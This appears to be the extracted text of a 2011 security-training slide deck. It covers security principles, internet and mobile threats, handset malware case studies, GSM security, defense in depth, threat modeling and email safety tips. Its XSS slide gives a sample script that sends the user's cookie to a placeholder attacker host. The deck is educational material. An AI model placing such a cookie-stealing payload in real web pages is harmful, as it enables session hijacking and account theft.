Security and Communication
Security Concept
Current threats by mobile malware
Several types of attacks relevant to small devices
Threats and vulnerabilities in wireless networks and handheld devices
Today’s Information Challenge
More than 80% of an enterprise's digitized information resides in individual hard drives and in personal files, and 80% of the data is unstructured, not secure, and not backed up.
Individuals hold the key to the knowledge economy, and most of it is lost when they leave the enterprise.
Employees get 50%-75% of their relevant information directly from other people.
Source: Gartner Group/CIBC World Markets
Security principles
Trust: Confidence to transact
Confidentiality: Ensure privacy of user information and transmission
Integrity: Ensure accuracy of data and data processing
Availability: Maximize functionality and uptime
To protect your system against those attacks, information security is also focused on these three areas:
Internet Security Vulnerabilities
Browsers
Operating Systems
Server settings
Software / Web Applications Bugs
Network Channels
Threats / Attacks
The following are samples of XSS:
<script>document.location='http://attackherhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>
The script sends the user’s cookie to the attacker’s host.
Buffer overflow
Malicious File Execution
Trojan horse programs
Email spoofing
Denial-of-Service (DoS)
Unprotected Windows shares
Chat clients
Packet sniffing
Dictionary or Brute Force Attack
Handset Security Issues (1)
Handset Malware History (1)
Case Study – CABIR
Case Study - ComWar
Case Study - CardTrap
Handset Malware History (2)
Android.Pjapps – Risk Level 1: Very Low
The images below show the installation process of a clean Steam Window application and a malicious one
 
When the Trojan is executed, it requests permissions to perform the following actions:
Android.Pjapps - Removal
Key Handset Security Problems
Jailbroken iPhones and Upgrades
Greenpois0n for iOS 4.2.1
But Beware Fake Jailbreaking Apps
And When You Do Get Successfully Jailbroken
The “ikee” Worm
The “Duh” Worm
Mobile Malware May Exploit Vulnerable Apps
PDF Vulnerabilities on the iPhone mygadgetnews.com/2010/10/03/pdf-vulnerability-being-used-for-malicious-purposes-on-iphone-ios/
App Vetting and Third Party App Sources
A Sample Malicious Android Application
Threats to Network Operator
GSM Security Operation
GSM Security Operation (Cont..)
GSM Security Operation (Cont..)
Mitigation Strategies
Methods/Techniques to Secure your Data / System
8 Steps to Secure Your Computer
What is Defense in Depth
Defense in Depth
Policies, Procedures, & Awareness: User education against social engineering
Physical Security: Guards, locks, tracking devices, HSM
Perimeter: Firewalls, VPN quarantine
Internal Network: Network segments, IPSec, NIDS
Host: OS hardening, update management, authentication
Application: Application hardening, antivirus
Data: ACL, encryption
The Identity Lifecycle
Architecture
Security Risk Analysis
Threat Modeling
1. Identify Assets
2. Create an Architecture Overview
3. Decompose the System
4. Identify the Threats
5. Document the Threats
6. Rate the Threats
Email Safety Tips
Managing Spam Email Spam is often more of an annoyance than a security risk. However, many email viruses are sent as spam and can be caught by spam filters.
Spoof Email (Phishing)
Phishing emails are an attempt by thieves to lure you into divulging personal and financial information, for their profit. They pretend to be from well-known legitimate businesses, and increasingly look as if they actually are. They use clever techniques to induce a sense of urgency on your part so that you don't stop to think about whether they are legitimate or not. You can learn to know what to look for and where to report these scams when you find them.
Don’t Send Sensitive Data in Email
Although it's convenient to send colleagues sensitive data in email, it is unsafe. Not only is email an insecure way of sending information, you've lost control over that information once you hit the send button.
Mobile security tips
Kaspersky Mobile Security
Security risk assessment
Infrastructure
Applications
Operations
People

Editor's Notes

  1. This talks to the stats – but tell them with all these issues – with lack of controls – it becomes easy to have fraud. You have no control and no accountability.
  2. 04/22/11 04:06